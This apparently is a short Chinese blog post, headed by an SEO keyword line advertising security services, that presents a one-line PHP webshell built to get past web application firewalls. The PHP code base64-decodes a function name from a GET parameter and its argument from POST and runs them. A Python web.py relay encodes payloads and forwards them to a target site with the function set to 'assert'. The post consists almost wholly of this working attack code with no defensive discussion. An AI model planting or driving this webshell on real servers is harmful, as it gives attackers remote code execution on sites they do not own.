大连,网络安全,信息安全,防黑客,SEO,搜索引擎优化,网站防黑,网站被黑处理,系统安全,企业安全,信息技术,web开发,数据库,网络技术,windows,linux,网站建设 就找QQ:48011203

PHP 一句话webshell绕过WAF

<?php

$a = base64_decode($_GET[huai]);

$b = base64_decode($_POST[xia]);

$a($b);

?>



import web

import requests

import urllib2

import base64


urls = (

    '/','hello'

)


app = web.application(urls,globals())


class hello:

    def POST(self):

        payload = web.input()

        payload['xia'] = base64.b64encode(payload['xia'])

        print payload   

        req = requests.post('http://www.xxx.jp/error.php?huai=YXNzZXJ0',data=payload)

        return req.content


if __name__ == "__main__":

    app.run()


评论
热度 ( 1 )